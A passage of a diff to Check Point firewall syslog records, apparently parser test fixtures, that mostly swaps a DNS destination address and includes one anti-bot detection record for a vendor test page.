-<134>1 2020-03-29T17:25:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9ef,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502703"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42889"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9ef,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502703"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56427"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9ef,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502703"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"42889"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:03Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9ef,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"209.87.209.101"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"35278"; service:"443"; service_id:"https"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502704"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38875"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f0,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502704"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38875"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:04Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f0,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"72.246.28.170"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"56338"; service:"80"; service_id:"http"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:04Z gw-da58d3 CheckPoint 8363 - [action:"Detect"; flags:"444672"; ifdir:"outbound"; ifname:"eth1"; loguid:"{0x5e80d9f0,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; confidence_level:"5"; dst:"72.246.28.170"; http_host:"sc1.checkpoint.com"; log_id:"2"; malware_action:"Communication with C&C site"; malware_family:"Check Point"; malware_rule_id:"{227D6BCD-3280-4894-B0EB-0FF6A5FEACF1}"; method:"GET"; policy:"Standard"; policy_time:"1585502567"; product:"Anti Malware"; protection_id:"00233CFEE"; protection_name:"Check Point - Testing Bot"; protection_type:"URL reputation"; proto:"6"; proxy_src_ip:"192.168.2.2"; resource:"http://sc1.checkpoint.com/za/images/threatwiki/pages/TestAntiBotBlade.html"; s_port:"56338"; scope:"192.168.2.2"; service:"80"; session_id:"{0x5e80d9f0,0x2,0x353707c7,0xee78a1dc}"; severity:"2"; smartdefense_profile:"Optimized"; src:"192.168.2.2"; layer_name:"Standard Threat Prevention"; layer_uuid:"{0DBE7C44-6D3F-4F28-8F2B-0E6790E57F8A}"; malware_rule_id:"{227D6BCD-3280-4894-B0EB-0FF6A5FEACF1}"; smartdefense_profile:"Optimized"; user_agent:"Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"; web_client_type:"Firefox"]
 <134>1 2020-03-29T17:25:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f1,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585502705"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"56340"; service:"80"; service_id:"http"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f1,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585502705"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"56342"; service:"80"; service_id:"http"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f1,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585502705"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"56344"; service:"80"; service_id:"http"; src:"192.168.2.2"]
-<134>1 2020-03-29T17:25:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f1,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502705"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49461"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T17:25:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f1,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502705"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49461"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f1,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585502705"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"56346"; service:"80"; service_id:"http"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f1,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585502705"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"56348"; service:"80"; service_id:"http"; src:"192.168.2.2"]
 <134>1 2020-03-29T17:25:05Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f1,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585502705"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"56350"; service:"80"; service_id:"http"; src:"192.168.2.2"]
@@ -2821,27 +2821,27 @@ <134>1 2020-03-29T17:25:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f2,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585502706"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59060"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:25:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f2,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585502706"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59062"; service:"443"; service_id:"https"; src:"192.168.2.2"] <134>1 2020-03-29T17:25:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f2,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"72.246.28.170"; log_delay:"1585502706"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"59064"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:25:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f2,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502706"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58207"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:25:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f2,0x4,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"5"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502706"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"58207"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:25:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f2,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"172.217.17.110"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"42424"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:25:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f2,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502706"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46013"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52663"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60493"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:25:06Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f2,0x6,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"7"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502706"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"46013"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52663"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585502707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60493"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] <134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"108.177.119.156"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"41750"; service:"443"; service_id:"https"; src:"192.168.2.2"] -<134>1 2020-03-29T17:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80d9f3,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585502707"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; 